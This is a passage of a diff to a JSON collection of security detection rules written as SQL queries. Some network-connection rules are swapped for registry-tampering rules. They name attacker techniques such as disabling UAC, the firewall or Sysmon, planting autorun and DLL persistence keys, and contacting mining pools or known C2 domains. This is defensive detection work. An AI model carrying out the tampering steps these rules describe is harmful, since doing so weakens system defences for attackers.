AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Microsoft Sync Center Suspicious Network Connections", - "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "title": "Disable UAC Using Registry", + "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", "status": "experimental", - "description": 
"Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "author": "elhoim", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "author": "frack113", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" + "filename": "registry_set_disable_uac_registry.yml" }, { - "title": "Python 
Initiated Connection", - "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate python script" + "Valid Macros and/or internal documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND NewProcessName LIKE '%python%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "net_connection_win_python.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": 
"50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Disable Microsoft Defender Firewall via Registry", + "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" - ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" - }, - { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.impact", - "attack.t1496" - ], - "falsepositives": [ - "Legitimate use of crypto miners" - ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 
'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_disable_defender_firewall.yml" }, { - "title": "Rundll32 Internet Connection", - "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "title": "Registry Explorer Policy Modification", + "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "status": "test", - "description": "Detects a rundll32 that communicates with public IP addresses", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" + "attack.t1112" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": 
"net_connection_win_rundll32_net_connections.yml" + "filename": "registry_set_set_nopolicies_user.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to 
legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "title": "Office Autorun Keys Modification", + "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE 
'\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\edge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE 
'\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_asep_reg_keys_modification_office.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", - 
"status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "status": "test", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1203" - ], - "falsepositives": [ - "Unknown" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion" ], 
"falsepositives": [ - "Web Browsers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Disable Sysmon Event Logging Via Registry", 
+ "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR 